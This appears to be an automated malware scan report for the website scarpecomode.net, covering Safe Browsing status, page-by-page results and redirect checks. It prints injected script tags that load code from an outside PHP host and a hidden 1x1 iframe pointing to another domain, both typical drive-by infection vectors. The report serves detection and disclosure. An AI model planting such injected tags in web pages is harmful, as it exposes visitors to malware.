Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=scarpecomode.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://scarpecomode.net/ | 200 OK Content-Length: 4384 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://brunati.com.ar/qghtrhxr.php?id=54950854"></script> Hidden iFrame found. size: 1x1 src: http://marcodenicolais.it/stata.html <iframe src=http://marcodenicolais.it/stata.html width=1 height=1 frameborder=0> | ||
http://scarpecomode.net/jquery/jquery-1.4.2.min.js | 200 OK Content-Length: 78479 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o )e(a[o],b,f?d.call(a[o] Antivirus reports:
| ||
http://scarpecomode.net/jquery/jquery.slidertron-0.1.js | 200 OK Content-Length: 17571 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { jQuery.fn.slidertron = function(options) { var settings = jQuery.extend({ selectorParent: jQuery(this) }, options); return jQuery.slidertron(settings); } jQuery.slidertron = function(options) { var settings = jQuery.extend({ selectorParent: null, viewerSelector: null, slidesSelector: null, navNextSelector: null, navPre Antivirus reports:
| ||
http://scarpecomode.net/index.html | 200 OK Content-Length: 4384 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://brunati.com.ar/qghtrhxr.php?id=54950854"></script> Hidden iFrame found. size: 1x1 src: http://marcodenicolais.it/stata.html <iframe src=http://marcodenicolais.it/stata.html width=1 height=1 frameborder=0> | ||
http://scarpecomode.net/materiali.html | 200 OK Content-Length: 5109 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://brunati.com.ar/qghtrhxr.php?id=54950855"></script> | ||
http://scarpecomode.net/plantari.html | 200 OK Content-Length: 3710 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://brunati.com.ar/qghtrhxr.php?id=54950856"></script> | ||
http://scarpecomode.net/consigli.html | 200 OK Content-Length: 2463 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://brunati.com.ar/qghtrhxr.php?id=54950853"></script> | ||
http://scarpecomode.net/test404page.js | 404 Not Found Content-Length: 278 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: scarpecomode.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 11:12:37 GMT
Accept-Ranges: bytes
Server: nginx
Content-Length: 4384
Content-Type: text/html
Last-Modified: Fri, 28 Nov 2014 10:22:50 GMT
X-Powered-By: PleskLin
...4384 bytes of data.
GET / HTTP/1.1
Host: scarpecomode.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 11:12:37 GMT
Accept-Ranges: bytes
Server: nginx
Content-Length: 4384
Content-Type: text/html
Last-Modified: Fri, 28 Nov 2014 10:22:50 GMT
X-Powered-By: PleskLin
...4384 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: scarpecomode.net
Referer: http://www.google.com/search?q=scarpecomode.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: scarpecomode.net
Referer: http://www.google.com/search?q=scarpecomode.net
Result:
The result is similar to the first query. There are no suspicious redirects found.